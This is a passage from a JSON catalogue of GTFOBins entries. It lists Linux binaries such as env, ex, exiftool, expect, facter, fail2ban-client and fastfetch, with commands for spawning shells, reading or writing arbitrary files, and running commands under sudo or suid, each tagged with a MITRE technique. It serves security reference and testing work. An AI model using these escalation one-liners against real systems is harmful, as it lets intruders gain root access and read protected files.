execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:env:shell:0:unprivileged","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/env/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eqn:file-read:0:sudo","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eqn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eqn:file-read:0:suid","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/eqn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eqn:file-read:0:unprivileged","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eqn/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:espeak:file-read:0:sudo","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/espeak/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:espeak:file-read:0:suid","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/espeak/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:espeak:file-read:0:unprivileged","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/espeak/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:inherit:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:inherit:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:inherit:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:shell:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:shell:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ex:shell:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-read:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-read:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:1:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:1:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:2:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:2:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:3:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:file-write:3:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:inherit:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:exiftool:inherit:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expand:file-read:0:sudo","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expand:file-read:0:suid","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expand:file-read:0:unprivileged","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expand/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:file-read:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:file-read:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:file-read:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:shell:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:shell:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh -p;interact'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:expect:shell:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:0:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:0:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:1:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:facter:inherit:1:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fail2ban-client:command:0:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fail2ban-client add x\nfail2ban-client set x addaction x\nfail2ban-client set x action x actionban /path/to/command\nfail2ban-client start x\nfail2ban-client set x banip 999.999.999.999\nfail2ban-client set x unbanip 999.999.999.999\nfail2ban-client stop x","description":"The subprocess is immediately sent to the background, but `fail2ban-client` waits on a return code from the subprocess. The `banip` command will hang until the subprocess returns.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fail2ban-client:command:1:sudo","toolId":"gtfo:fail2ban-client","toolName":"fail2ban-client","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-dir/fail2ban.conf <<EOF\n[Definition]\nEOF\n\ncat >/path/to/temp-dir/jail.local <<EOF\n[x]\nenabled = true\naction = x\nEOF\n\nmkdir -p /path/to/temp-dir/action.d/\ncat >/path/to/temp-dir/action.d/x.conf <<EOF\n[Definition]\nactionstart = /path/to/command\nEOF\n\nmkdir -p /path/to/temp-dir/filter.d/\ncat >/path/to/temp-dir/filter.d/x.conf <<EOF\n[Definition]\nEOF\n\nfail2ban-client -c /path/to/temp-dir/ -v restart","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:command:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:command:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:command:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /path/to/command\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:file-read:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:file-read:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:file-read:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fastfetch --file /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:shell:0:sudo","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:shell:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:shell:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c 